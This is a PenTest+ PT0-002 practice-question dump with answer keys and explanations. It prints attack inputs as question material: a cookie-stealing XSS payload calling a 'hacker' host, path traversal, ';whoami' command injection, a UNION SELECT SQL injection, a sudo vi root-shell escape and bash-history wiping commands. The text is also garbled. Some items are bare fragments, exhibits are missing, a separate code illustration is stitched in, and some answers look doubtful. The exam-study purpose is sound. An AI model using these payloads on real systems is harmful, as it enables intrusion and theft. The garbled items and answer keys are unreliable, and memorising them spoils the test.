PT0-002 CompTIA PenTest+ Updated Practice Questions

The document provides a set of practice questions for the PT0-002 exam, designed to mirror the actual exam's structure and topics. It includes topic-focused questions, accurate answer keys, and is intended for personal study only. Additional resources for further study are available at CertQuestionsBank.com.

This PDF contains a set of carefully selected practice questions for the PT0-002 exam. These questions are designed to reflect the structure, difficulty, and topics covered in the actual exam, helping you reinforce your understanding and identify areas for improvement.

What's Inside:

1. Topic-focused questions based on the latest exam objectives
2. Accurate answer keys to support self-review
3. Designed to simulate the real test environment
4. Ideal for final review or daily practice

Important Note:

This material is for personal study purposes only. Please do not redistribute or use for commercial purposes without permission.

For full access to the complete question bank and topic-wise explanations, visit:
CertQuestionsBank.com

Our YouTube: https://www.youtube.com/@CertQuestionsBank

FB page: https://www.facebook.com/certquestionsbank
Share some PT0-002 exam online questions below.
1.A penetration tester completed a vulnerability scan against a web server and identified a single but
severe vulnerability.
Which of the following is the BEST way to ensure this is a true positive?
A. Run another scanner to compare.
B. Perform a manual test on the server.
C. Check the results on the scanner.
D. Look for the vulnerability online.
Answer: B

2. Which of the following documents would be the most helpful in determining who is at fault for a
temporary outage that occurred during a penetration test?
A. Non-disclosure agreement
B. Business associate agreement
C. Assessment scope and methodologies
D. Executive summary
Answer: C
Explanation:
The assessment scope and methodologies document defines the objectives, boundaries, rules of
engagement, and expected outcomes of a penetration testing engagement. It also specifies the roles
and responsibilities of the testers and the clients, as well as the communication channels and
escalation procedures. This document can help determine who is at fault for a temporary outage that
occurred during a penetration test, as it can clarify whether the outage was within the agreed scope
and methodologies, or whether it was caused by a violation of the rules of engagement or a lack of
coordination.
Reference:
• CompTIA PenTest+ Certification Exam Objectives, Domain 1.0 Planning and Scoping, Objective
1.1: Given a scenario, explain the importance of scoping an engagement properly.
• The Official CompTIA PenTest+ Instructor and Student Guides (PT0-002), Lesson 1: Planning and
Scoping Penetration Tests, Topic 1.1: Introduction to Penetration Testing Concepts, Topic 1.2: The
Penetration Testing Process, Topic 1.3: Planning and Scoping Penetration Tests.

3.During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:
A. SOW.
B. SLA.
C. ROE.
D. NDA
Answer: C
Explanation:
https://mainnerve.com/what-are-rules-of-engagement-in-pen-testing/#:~:text=The ROE includes the dates,limits%2C or out of scope.

4.A red-team tester has been contracted to emulate the threat posed by a malicious insider on a
company’s network, with the constrained objective of gaining access to sensitive personnel files.
During the assessment, the red-team tester identifies an artifact indicating possible prior compromise
within the target environment.
Which of the following actions should the tester take?
A. Perform forensic analysis to isolate the means of compromise and determine attribution.
B. Incorporate the newly identified method of compromise into the red team’s approach.
C. Create a detailed document of findings before continuing with the assessment.
D. Halt the assessment and follow the reporting procedures as outlined in the contract.
Answer: D

5.10.1.0/24

6. SQLi error - parameterized queries

7.A penetration tester completed an assessment, removed all artifacts and accounts created during
the test, and presented the findings to the client.
Which of the following happens NEXT?
A. The penetration tester conducts a retest.
B. The penetration tester deletes all scripts from the client machines.
C. The client applies patches to the systems.
D. The client clears system logs generated during the test.
Answer: C

8. During an assessment, a penetration tester obtains a list of password digests using Responder.
Which of the following tools would the penetration tester most likely use next?
A. Hashcat
B. Hydra
C. CeWL
D. Medusa
Answer: A
Explanation:
When a penetration tester obtains a list of password digests using Responder, the next logical step is
to attempt to crack these password hashes to retrieve the plaintext passwords. Hashcat is one of the
most widely used tools for this purpose. It is a high-performance password recovery tool that supports
a wide range of hashing algorithms and can utilize the power of GPU acceleration to significantly
speed up the cracking process.
Hashcat is preferred over tools like Hydra, CeWL, and Medusa in this context because it is
specifically designed for cracking password hashes rather than brute-forcing login credentials (Hydra,
Medusa) or generating custom wordlists (CeWL).
Reference: Hashcat official website: Hashcat
Usage examples in various penetration testing reports, including those involving password cracking
and hash manipulation.

9. After obtaining a reverse shell connection, a penetration tester runs the following command:
www-data@server12: sudo -l
User www-data may run the following commands on server12: (root) NOPASSWD: /usr/bin/vi
Which of the following is the fastest way to escalate privileges on this server?
A. Editing the file /etc/passwd to add a new user with uid 0
B. Creating a Bash script, saving it on the /tmp folder, and then running it
C. Executing the command sudo vi -c ':!bash'
D. Editing the file /etc/sudoers to allow any command
Answer: C
Explanation:
When the penetration tester has NOPASSWD privileges to run vi as root, the quickest way to
escalate privileges is to leverage vi to execute a shell. The command sudo vi -c ':!bash' opens vi as
the root user and immediately spawns a shell within vi. This method is fast and effective because vi
(or vim) has the capability to run shell commands.
Executing sudo vi -c ':!bash' will open vi and then immediately run the :!bash command, which
spawns a Bash shell with root privileges.
Reference: GTFOBins - vi
Example from penetration testing reports where vi is used to escalate privileges: Writeup.

10.A penetration tester who is performing an engagement notices a specific host is vulnerable to
EternalBlue.
Which of the following would BEST protect against this vulnerability?
A. Network segmentation
B. Key rotation
C. Encrypted passwords
D. Patch management
Answer: D
Explanation:
Patch management is the process of identifying, downloading, and installing security patches for a
system in order to address new vulnerabilities and software exploits. In the case of EternalBlue, the
vulnerability was addressed by Microsoft in the form of a security patch. Installing this patch on the
vulnerable host will provide protection from the vulnerability. Additionally, organizations should
implement a patch management program to regularly check for and install security patches for the
systems in their environment.
Network segmentation (A) can limit the impact of a compromise by separating different parts of the
network into smaller, more isolated segments. However, it does not address the vulnerability itself.
Key rotation (B) is the process of periodically changing cryptographic keys, which can help protect
against attacks that rely on stolen or compromised keys. However, it is not directly related to the
EternalBlue vulnerability.
Encrypted passwords (C) can help protect user credentials in case of a data breach or other
compromise, but it does not prevent attackers from exploiting the EternalBlue vulnerability.
Reference: CompTIA PenTest+ Certification Guide, Chapter 1: Pre-engagement Interactions, Page
21.

11.The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?
A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22
handle heartbeat extension packets, allowing attackers to obtain sensitive information from process
memory.
B. This device is most likely a gateway with in-band management services.
C. This device is most likely a proxy server forwarding requests over TCP/443.
D. This device may be vulnerable to remote code execution because of a buffer overflow vulnerability
in the method used to extract DNS names from packets prior to DNSSEC validation.
Answer: B
Explanation:
The Heartbleed bug is an OpenSSL bug; it does not affect SSH. Ref:
https://www.sos-berlin.com/en/news-heartbleed-bug-does-not-affect-jobscheduler-or-ssh

12.Which of the following tools would BEST allow a penetration tester to capture wireless handshakes
to reveal a Wi-Fi password from a Windows machine?
A. Wireshark
B. EAPHammer
C. Kismet
D. Aircrack-ng
Answer: D
Explanation:
The BEST tool to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine
is Aircrack-ng. Aircrack-ng is a suite of tools used to assess the security of wireless networks. It starts
by capturing wireless network packets [1], then attempts to crack the network password by analyzing
them [1]. Aircrack-ng supports FMS, PTW, and other attack types, and can also be used to generate
keystreams for WEP and WPA-PSK encryption. It is capable of running on Windows, Linux, and Mac
OS X.

13.A penetration tester recently performed a social-engineering attack in which the tester found an
employee of the target company at a local coffee shop and over time built a relationship with the
employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift.
Which of the following social-engineering attacks was the tester utilizing?
A. Phishing
B. Tailgating
C. Baiting
D. Shoulder surfing
Answer: C
Explanation:
Reference: https://phoenixnap.com/blog/what-is-social-engineering-types-of-threats

14.A software development team is concerned that a new product's 64-bit Windows binaries can be
deconstructed to the underlying code.
Which of the following tools can a penetration tester utilize to help the team gauge what an attacker
might see in the binaries?
A. Immunity Debugger
B. OllyDbg
C. GDB
D. Drozer
Answer: A
Explanation:
Immunity Debugger is a powerful tool used for reverse engineering and debugging software. It is
especially suited for analyzing how malicious code works and could certainly be used to inspect a
64-bit Windows binary. It is used to find vulnerabilities in the code and would be a good choice for
understanding what an attacker might see in the binaries.
It's worth noting that OllyDbg is also a popular tool for this purpose, but it has less support for 64-bit
binaries compared to other tools like Immunity Debugger. GDB (GNU Debugger) is more frequently
used in Linux environments. Drozer is a tool used specifically for Android security assessments.

15. During a penetration test, a tester found a web component with no authentication requirements.
The web component also allows file uploads and is hosted on one of the target's public web servers.
Which of the following actions should the penetration tester perform next?
A. Continue the assessment and mark the finding as critical.
B. Attempt to remediate the issue temporarily.
C. Notify the primary contact immediately.
D. Shut down the web server until the assessment is finished.
Answer: C
Explanation:
The penetration tester should notify the primary contact immediately, as this is a serious security
issue that may compromise the confidentiality, integrity, and availability of the web server and its data.
A web component with no authentication requirements and file upload capabilities can allow an
attacker to upload malicious files, such as web shells, backdoors, or malware, to the web server and
gain remote access or execute arbitrary commands on the web server. This can lead to further
attacks, such as data theft, data corruption, privilege escalation, lateral movement, or denial of
service. The penetration tester should inform the primary contact of the issue and its potential impact,
and provide recommendations for remediation, such as implementing authentication mechanisms,
restricting file upload types and sizes, or scanning uploaded files for malware. The other options are
not appropriate actions for the penetration tester at this stage. Continuing the assessment and
marking the finding as critical would delay the notification and remediation of the issue, which may
increase the risk of exploitation by other attackers. Attempting to remediate the issue temporarily
would interfere with the normal operation of the web server and may cause unintended consequences
or damage. Shutting down the web server until the assessment is finished would disrupt the
availability of the web server and its services, and may violate the scope or agreement of the
assessment.

16. A penetration tester is performing an assessment for an application that is used by large
organizations operating in the heavily regulated financial services industry. The penetration tester
observes that the default Admin User account is enabled and appears to be used several times a day
by unfamiliar IP addresses.
Which of the following is the most appropriate way to remediate this issue?
A. Increase password complexity.
B. Implement system hardening.
C. Restrict simultaneous user log-ins.
D. Require local network access.
Answer: B
Explanation:
System hardening is a comprehensive approach to securing systems and applications that includes a
variety of measures like disabling unnecessary accounts (such as default admin accounts), enforcing
the use of strong passwords, updating and patching systems, restricting network access, and
implementing proper authentication and authorization controls. Given the high-stakes environment of
the financial services industry, a robust system hardening process is essential to prevent
unauthorized access, particularly for an account that has default privileges and is being accessed by
unfamiliar IP addresses.

17.137.1.0/24

18.An Nmap scan shows open ports on web servers and databases. A penetration tester decides to
run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?
A. Uncover potential criminal activity based on the evidence gathered.
B. Identify all the vulnerabilities in the environment.
C. Limit invasiveness based on scope.
D. Maintain confidentiality of the findings.
Answer: C

19.A company that requires minimal disruption to its daily activities needs a penetration tester to
perform information gathering around the company’s web presence.
Which of the following would the tester find MOST helpful in the initial information-gathering steps?
(Choose two.)
A. IP addresses and subdomains
B. Zone transfers
C. DNS forward and reverse lookups
D. Internet search engines
E. Externally facing open ports
F. Shodan results
Answer: A,D

20.A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?
A. Delete the scheduled batch job.
B. Close the reverse shell connection.
C. Downgrade the svsaccount permissions.
D. Remove the tester-created credentials.
Answer: D

21. A penetration tester gains access to a system and establishes persistence, and then runs the
following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?
A. Redirecting Bash history to /dev/null
B. Making a copy of the user's Bash history for further enumeration
C. Covering tracks by clearing the Bash history
D. Making decoy files on the system to confuse incident responders
Answer: C
Explanation:
Reference: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/

22. A penetration tester is conducting a test after hours and notices a critical system was taken down.
Which of the following contacts should be notified first?
A. Secondary
B. Emergency
C. Technical
D. Primary
Answer: D
Explanation:
In the context of penetration testing, the primary contact is typically the first point of contact
established before the penetration test begins. This person is usually a stakeholder or an individual
who has the authority and responsibility over the system being tested. In the scenario where a critical
system is taken down during off-hours, the primary contact should be notified first to ensure a prompt
and coordinated response. The primary contact can then decide on the next steps, including
escalating the issue to technical, secondary, or emergency contacts if necessary. This approach
maintains the chain of command and ensures that the appropriate parties are informed in a structured
manner.

23.A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating
proprietary company information. The administrator offers to pay the tester to keep quiet.
Which of the following is the BEST action for the tester to take?
A. Check the scoping document to determine if exfiltration is within scope.
B. Stop the penetration test.
C. Escalate the issue.
D. Include the discovery and interaction in the daily report.
Answer: C
Explanation:
In a situation where illegal or unethical activity is discovered during an assessment, the appropriate
course of action is to escalate the issue to the appropriate parties in the organization, such as
management, or the person or team who hired the penetration tester. This ensures that those
responsible for the organization's security and compliance are aware of the situation and can take
appropriate action.
A) Checking the scoping document won't help in this situation. While the scoping document defines
the boundaries for the penetration test, the discovery of illegal activity is outside the realm of a typical
penetration test and needs to be handled differently.
B) Stopping the penetration test might not be necessary and doesn't address the issue at hand, which
is the discovered illicit activity and bribe attempt.
D) While including the discovery and interaction in the daily report is important, it is not sufficient. A
situation as serious as this warrants immediate escalation.

24.The following PowerShell snippet was extracted from a log of an attacker machine:

A penetration tester would like to identify the presence of an array.


Which of the following line numbers would define the array?
A. Line 8
B. Line 13
C. Line 19
D. Line 20
Answer: A
Explanation:
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_arrays?view=powershell-7.3

25. A penetration tester executes the following Nmap command and obtains the following output:

Which of the following commands would best help the penetration tester discover an exploitable
service?
A. nmap -v -p 25 -- soript smtp-enum-users remotehost
B. nmap -v -- script=mysql-info.nse remotehost
C. nmap --ocript=omb-brute.noe remotehoat
D. nmap -p 3306 -- script "http*vuln*" remotehost
Answer: B
Explanation:
The Nmap command in the question scans all ports on the remote host and identifies the services
and versions running on them. The output shows that port 3306 is open and running MariaDB, which
is a fork of MySQL. Therefore, the best command to discover an exploitable service would be to use
the mysql-info.nse script, which gathers information about the MySQL server, such as the version,
user accounts, databases, and configuration variables. The other commands are either misspelled,
irrelevant, or too broad for the task.
Reference: Best PenTest+ certification study resources and training materials, CompTIA PenTest+
PT0-002 Cert Guide, 101 Labs - CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam

26. Which of the following elements of a penetration testing report aims to provide a normalized and
standardized representation of discovered vulnerabilities and the overall threat they present to an
affected system or network?
A. Executive summary
B. Vulnerability severity rating
C. Recommendations of mitigation
D. Methodology
Answer: B
Explanation:
The vulnerability severity rating element of a penetration testing report provides a normalized and
standardized representation of discovered vulnerabilities and their threat levels. It typically involves
assigning a numerical or categorical score (such as low, medium, high, critical) to each vulnerability
based on factors like exploitability, impact, and the context in which the vulnerability exists. This helps
in prioritizing the vulnerabilities for remediation and provides a clear understanding of the risk they
pose to the system or network.

27.An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking
for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is
not available where the executive is staying.
Which of the following attacks is the executive most likely experiencing?
A. Data modification
B. Amplification
C. Captive portal
D. Evil twin
Answer: D
Explanation:
The attacker creates an access point with the same name and network settings as a legitimate
access point, but with a stronger signal to attract users. Once a victim connects to the rogue access
point, the attacker can intercept and steal any data transmitted over the connection, including login
credentials, credit card information, and other sensitive data.

28.During a web application test, a penetration tester was able to navigate to https://company.com
and view all links on the web page. After manually reviewing the pages, the tester used a web
scanner to automate the search for vulnerabilities. When returning to the web application, the
following message appeared in the browser: unauthorized to view this page.
Which of the following BEST explains what occurred?
A. The SSL certificates were invalid.
B. The tester IP was blocked.
C. The scanner crashed the system.
D. The web page was not found.
Answer: B

29. Given the following code:

<SCRIPT>var img=new Image();img.src="http://hacker/"+document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
A. Web-application firewall
B. Parameterized queries
C. Output encoding
D. Session tokens
E. Input validation
F. Base64 encoding
Answer: C,E
Explanation:
Encoding (commonly called “Output Encoding”) involves translating special characters into some
different but equivalent form that is no longer dangerous in the target interpreter, for example
translating the < character into the &lt; string when writing to an HTML page.
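As an added illustration of the two controls the answer names (this is example code, not part of the question bank or any product it cites), the following Python applies output encoding and an allowlist input check to the payload from the question. The username rule, the page templates and the sample input are assumptions made up for the example.

```python
import html
import re

# Constructed sample: the payload from the question, as it would arrive in a
# request parameter once the URL-encoded '+' signs are decoded to spaces.
MALICIOUS_INPUT = (
    '<SCRIPT>var img=new Image();'
    'img.src="http://hacker/"+document.cookie;</SCRIPT>'
)

# Allowlist for a field that should only ever hold a username (an assumption
# for this example; the real rule depends on the application).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def encode_for_html_body(value: str) -> str:
    """Output encoding: every character HTML reads as markup (< > & " ')
    becomes an entity, so the browser renders it as text instead of parsing it."""
    return html.escape(value, quote=True)


def validate_username(value: str) -> bool:
    """Input validation: accept only what the field can legitimately contain."""
    return USERNAME_RE.fullmatch(value) is not None


def render_greeting(username: str) -> str:
    """Both controls together. Validation rejects the payload outright;
    encoding still protects the page if the rule is ever loosened."""
    if not validate_username(username):
        raise ValueError("username rejected by allowlist")
    return f"<p>Welcome, {encode_for_html_body(username)}</p>"


def render_comment(comment: str) -> str:
    """Free text cannot be allowlisted, so here encoding is the control that
    matters: the untrusted part is escaped and wrapped in trusted markup."""
    return f'<div class="comment">{encode_for_html_body(comment)}</div>'


def is_inert(fragment: str) -> bool:
    """Check on what reached the page: no raw tag or quote character survived."""
    return re.search(r'[<>"\']', fragment) is None


if __name__ == "__main__":
    print(render_comment(MALICIOUS_INPUT))
    try:
        render_greeting(MALICIOUS_INPUT)
    except ValueError as err:
        print("rejected:", err)
```

Run it and the comment template emits `&lt;SCRIPT&gt;...&lt;/SCRIPT&gt;`, which a browser shows as literal text, while the greeting template refuses the value before it is ever rendered. Encoding must match the context the value lands in (HTML body here; attribute, URL and JavaScript contexts need their own rules), which is why validation alone is not enough and encoding alone is not enough.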

30. A security analyst needs to perform a scan for SMB port 445 over a /16 network.
Which of the following commands would be the BEST option when stealth is not a concern and the
task is time sensitive?
A. Nmap -s 445 -Pn -T5 172.21.0.0/16
B. Nmap -p 445 -n -T4 -open 172.21.0.0/16
C. Nmap -sV --script=smb* 172.21.0.0/16
D. Nmap -p 445 -max -sT 172. 21.0.0/16
Answer: B
Explanation:
Nmap is a powerful network scanning tool used for network discovery and security auditing. The
options used in this command perform the following functions:
-p 445: This tells nmap to only scan for TCP port 445 (SMB).
-n: This tells nmap to skip DNS resolution, saving time.
-T4: This sets the timing template to "aggressive". This speeds up the scan, but makes it less
stealthy, which isn't a concern here.
-open: This tells nmap to only show open ports in the results, making the output easier to read and
understand.

31. Which of the following situations would require a penetration tester to notify the emergency
contact for the engagement?
A. The team exploits a critical server within the organization.
B. The team exfiltrates PII or credit card data from the organization.
C. The team loses access to the network remotely.
D. The team discovers another actor on a system on the network.
Answer: D

32.A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a
shell. However, a connection was not established, and no errors were shown on the payload
execution. The penetration tester suspected that a network device, like an IPS or next-generation
firewall, was dropping the connection.
Which of the following payloads are MOST likely to establish a shell successfully?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
Answer: E
Explanation:
Payloads that use HTTP(S) are more likely to successfully bypass a network device like an Intrusion
Prevention System (IPS) or Next-Generation Firewall (NGFW). This is because HTTP(S) is a
common traffic type that is allowed on most networks. HTTPS specifically is encrypted, making it
difficult for an IPS or NGFW to analyze the content of the traffic and block it.
The Meterpreter payload has many features designed for evasion, and when used with HTTPS (in
this case, the "windows/x64/meterpreter/reverse_https" payload), it has a better chance of bypassing
network security controls and establishing a connection back to the penetration tester.
A) windows/x64/meterpreter/reverse_tcp, C) windows/x64/shell_reverse_tcp, and D)
windows/x64/powershell_reverse_tcp all use TCP without encryption or any particular evasion
techniques, which makes them more likely to be caught by an IPS or NGFW.
B) windows/x64/meterpreter/reverse_http does use HTTP, which can help with evasion, but HTTP
traffic can be inspected by IPS and NGFW devices, especially if they are configured for deep packet
inspection. HTTPS traffic, on the other hand, is encrypted and therefore harder for these devices to
analyze.

33.A company becomes concerned when the security alarms are triggered during a penetration test.
Which of the following should the company do NEXT?
A. Halt the penetration test.
B. Contact law enforcement.
C. Deconflict with the penetration tester.
D. Assume the alert is from the penetration test.
Answer: C

34. Which of the following is a ROE component that provides a penetration tester with guidance on
who and how to contact the necessary individuals in the event of a disaster during an engagement?
A. Engagement scope
B. Communication escalation path
C. SLA
D. SOW
Answer: B
Explanation:
The communication escalation path is a component of the Rules of Engagement (ROE) that provides
a penetration tester with guidance on whom to contact and how to proceed in the event of an
emergency or disaster during an engagement. This includes contact information for key individuals
and predefined procedures to follow to ensure that any issues are addressed promptly and
appropriately.
The engagement scope defines the boundaries and objectives of the test, the SLA (Service Level
Agreement) outlines performance and uptime requirements, and the SOW (Statement of Work)
details the tasks and deliverables. However, the communication escalation path specifically
addresses communication protocols during emergencies.
Reference: Explanation of Rules of Engagement components: OWASP Testing Guide
Examples from penetration testing engagements highlighting the importance of communication plans:
Anubis.

35.A potential reason for communicating with the client point of contact during a penetration test is to
provide resolution if a testing component crashes a system or service and leaves them unavailable for
both legitimate users and further testing.
Which of the following best describes this concept?
A. Retesting
B. De-escalation
C. Remediation
D. Collision detection
Answer: C
Explanation:
Communicating with the client point of contact during a penetration test, especially when a testing
component crashes a system or service, is crucial for remediation. Remediation involves the process
of correcting or mitigating vulnerabilities that have been identified during the test. In the context of a
system or service becoming unavailable, it's essential to promptly address and resolve the issue to
restore availability and ensure the continuity of legitimate business operations. This communication
ensures that the client is aware of the incident and can work together with the penetration tester to
implement corrective actions, thereby minimizing the impact on the business and further testing
activities.

36. A penetration tester needs to access a building that is guarded by locked gates, a security team,
and cameras.
Which of the following is a technique the tester can use to gain access to the IT framework without
being detected?
A. Pick a lock.
B. Disable the cameras remotely.
C. Impersonate a package delivery worker.
D. Send a phishing email.
Answer: C

37. Given the following Nmap scan command:

[root@kali ~]# nmap 192.168.0.* --exclude 192.168.0.101
Which of the following is the total number of servers that Nmap will attempt to scan?
A. 1
B. 101
C. 255
D. 256
Answer: C
Explanation:
The Nmap scan command given will scan all the hosts in the 192.168.0.0/24 subnet, except for the
one with the IP address 192.168.0.101. The subnet has 256 possible hosts, but one of them is
excluded, so the total number of servers that Nmap will attempt to scan is 255.
Reference: Nmap Commands - 17 Basic Commands for Linux Network, Section: Scan Multiple Hosts,
Subsection: Excluding Hosts from Search
Nmap Cheat Sheet 2023: All the Commands and More, Section: Target Specification, Subsection:
--exclude

38.Which of the following would MOST likely be included in the final report of a static application-
security test that was written with a team of application developers as the intended audience?
A. Executive summary of the penetration-testing methods used
B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe type-casting operations
Answer: D

39.A physical penetration tester needs to get inside an organization's office and collect sensitive
information without acting suspiciously or being noticed by the security guards. The tester has
observed that the company's ticket gate does not scan the badges, and employees leave their
badges on the table while going to the restroom.
Which of the following techniques can the tester use to gain physical access to the office? (Choose
two.)
A. Shoulder surfing
B. Call spoofing
C. Badge stealing
D. Tailgating
E. Dumpster diving
F. Email phishing
Answer: C,D

40.A penetration tester has gained access to part of an internal network and wants to exploit on a
different network segment.
Using Scapy, the tester runs the following command:

Which of the following represents what the penetration tester is attempting to accomplish?
A. DNS cache poisoning
B. MAC spoofing
C. ARP poisoning
D. Double-tagging attack
Answer: D
Explanation:
https://scapy.readthedocs.io/en/latest/usage.html

41.During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a
network administrator that is broadcasting Bluetooth frames.
Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?
A. Sniff and then crack the WPS PIN on an associated WiFi device.
B. Dump the user address book on the device.
C. Break a connection between two Bluetooth devices.
D. Transmit text messages to the device.
Answer: B
Explanation:
Bluesnarfing is the unauthorized access of information from a wireless device through a Bluetooth
connection, often between phones, desktops, laptops, and PDAs. This allows access to calendars,
contact lists, emails and text messages, and on some phones, users can copy pictures and private
videos.

42.During a security assessment, a penetration tester decides to write the following Python script:
import requests
x = ['OPTIONS', 'TRACE', 'TEST']
for y in x:
    z = requests.request(y, 'http://server.net')
    print(y, z.status_code, z.reason)
Which of the following is the penetration tester trying to accomplish? (Select two).
A. Web server denial of service
B. HTTP methods availability
C. Web application firewall detection
D. Web server fingerprinting
E. Web server error handling
F. Web server banner grabbing
Answer: B, E
Explanation:
HTTP methods availability - The script is testing which HTTP methods are supported by the server.
By sending requests using OPTIONS, TRACE, and a presumably custom or less commonly used
method (TEST), the tester can determine what methods the server will respond to and how it handles
different types of requests.
Web server error handling - By using non-standard or less commonly supported HTTP methods (like
TEST), the script checks how the server handles unexpected or invalid requests. This can reveal
information about the server's robustness and its error handling capabilities, which is crucial for
understanding potential vulnerabilities related to improper input handling.

43.A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in
/var/www/search.php on line 62
Which of the following commands can be used to further attack the website?
A. <script>var adr= ‘../evil.php?test=’ + escape(document.cookie);</script>
B. ../../../../../../../../../../etc/passwd
C. /var/www/html/index.php;whoami
D. 1 UNION SELECT 1, DATABASE(),3--
Answer: D

44.A penetration tester is assessing a wireless network. Although monitoring the correct channel and
SSID, the tester is unable to capture a handshake between the clients and the AP.
Which of the following attacks is the MOST effective to allow the penetration tester to capture a
handshake?
A. Key reinstallation
B. Deauthentication
C. Evil twin
D. Replay
Answer: B
Explanation:
A deauthentication attack forces the client to disconnect and reconnect to the AP, so the tester can
capture the handshake when the client re-associates.

45.A new security firm is onboarding its first client. The client only allowed testing over the weekend
and needed the results Monday morning. However, the assessment team was not able to access the
environment as expected until Monday.
Which of the following should the security company have acquired BEFORE the start of the
assessment?
A. A signed statement of work
B. The correct user accounts and associated passwords
C. The expected time frame of the assessment
D. The proper emergency contacts for the client
Answer: B

46.A penetration tester found the following valid URL while doing a manual assessment of a web
application: http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in
this URL?
A. SQLmap
B. Nessus
C. Nikto
D. DirBuster
Answer: A

47.A penetration tester logs in as a user in the cloud environment of a company.


Which of the following Pacu modules will enable the tester to determine the level of access of the
existing user?
A. iam_enum_permissions
B. iam_privesc_scan
C. iam_backdoor_assume_role
D. iam_bruteforce_permissions
Answer: A
Explanation:
Reference: https://essay.utwente.nl/76955/1/Szabo_MSc_EEMCS.pdf (37)

48.A security company has been contracted to perform a scoped insider-threat assessment to try to
gain access to the human resources server that houses PII and salary data. The penetration testers
have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?
A. Exploiting a configuration weakness in the SQL database
B. Intercepting outbound TLS traffic
C. Gaining access to hosts by injecting malware into the enterprise-wide update server
D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
E. Establishing and maintaining persistence on the domain controller
Answer: A

49.During the scoping phase of an assessment, a client requested that any remote code exploits
discovered during testing would be reported immediately so the vulnerability could be fixed as soon
as possible. The penetration tester did not agree with this request, and after testing began, the tester
discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a
loss of confidential credit card data and a hole in the system. At the end of the test, the penetration
tester willfully failed to report this information and left the vulnerability in place. A few months later, the
client was breached and credit card data was stolen.
After being notified about the breach, which of the following steps should the company take NEXT?
A. Deny that the vulnerability existed
B. Investigate the penetration tester.
C. Accept that the client was right.
D. Fire the penetration tester.
Answer: B

50.A penetration tester has been provided with only the public domain name and must enumerate
additional information for the public-facing assets.

INSTRUCTIONS
Select the appropriate answer(s), given the output from each section.
Output 1
Answer:
51.CORRECT TEXT
SIMULATION
Using the output, identify potential attack vectors that should be further investigated.
Answer:
1: Null session enumeration; Weak SMB file permissions; Fragmentation attack
2: nmap -sV -p 1-1023

52.A penetration tester has been given eight business hours to gain access to a client’s financial
system.
Which of the following techniques will have the highest likelihood of success?
A. Attempting to tailgate an employee going into the client's workplace
B. Dropping a malicious USB key with the company’s logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management
Answer: D

53. A penetration tester observes an application enforcing strict access controls.


Which of the following would allow the tester to bypass these controls and successfully access the
organization's sensitive files?
A. Remote file inclusion
B. Cross-site scripting
C. SQL injection
D. Insecure direct object references
Answer: D
Explanation:
Insecure Direct Object Reference (IDOR) vulnerabilities occur when an application provides direct access
to objects based on user-supplied input. This can allow an attacker to bypass authorization and access
resources in the system directly, for example database records or files. In this case, the penetration
tester could potentially bypass the strict access controls and access the organization's sensitive files.
Reference: IDOR Vulnerability Overview

54.A mail service company has hired a penetration tester to conduct an enumeration of all user
accounts on an SMTP server to identify whether previous staff member accounts are still active.
Which of the following commands should be used to accomplish the goal?
A. VRFY and EXPN
B. VRFY and TURN
C. EXPN and TURN
D. RCPT TO and VRFY
Answer: A
Explanation:
Reference: https://hackerone.com/reports/193314

55.A penetration tester runs the unshadow command on a machine.


Which of the following tools will the tester most likely use NEXT?
A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel
Answer: A
Explanation:
Reference: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
56.Which of the following documents describes activities that are prohibited during a scheduled
penetration test?
A. MSA
B. NDA
C. ROE
D. SLA
Answer: C
Explanation:
The document that describes activities that are prohibited during a scheduled penetration test is ROE,
which stands for rules of engagement. ROE is a document that defines the scope, objectives,
methods, limitations, and expectations of a penetration test. ROE can specify what activities are
allowed or prohibited during the penetration test, such as which targets, systems, networks, or
services can be tested or attacked, which tools, techniques, or exploits can be used or avoided, which
times or dates can be scheduled or excluded, or which impacts or risks can be accepted or mitigated.
ROE can help ensure that the penetration test is conducted in a legal, ethical, and professional
manner, and that it does not cause any harm or damage to the client or third parties. The other
options are not documents that describe activities that are prohibited during a scheduled penetration
test. MSA stands for master service agreement, which is a document that defines the general terms
and conditions of a contractual relationship between two parties, such as the scope of work, payment
terms, warranties, liabilities, or dispute resolution. NDA stands for non-disclosure agreement, which is
a document that defines the confidential information that is shared between two parties during a
business relationship, such as trade secrets, intellectual property, or customer data. SLA stands for
service level agreement, which is a document that defines the quality and performance standards of a
service provided by one party to another party, such as availability, reliability, responsiveness, or
security.

57.A CentOS computer was exploited during a penetration test. During initial reconnaissance, the
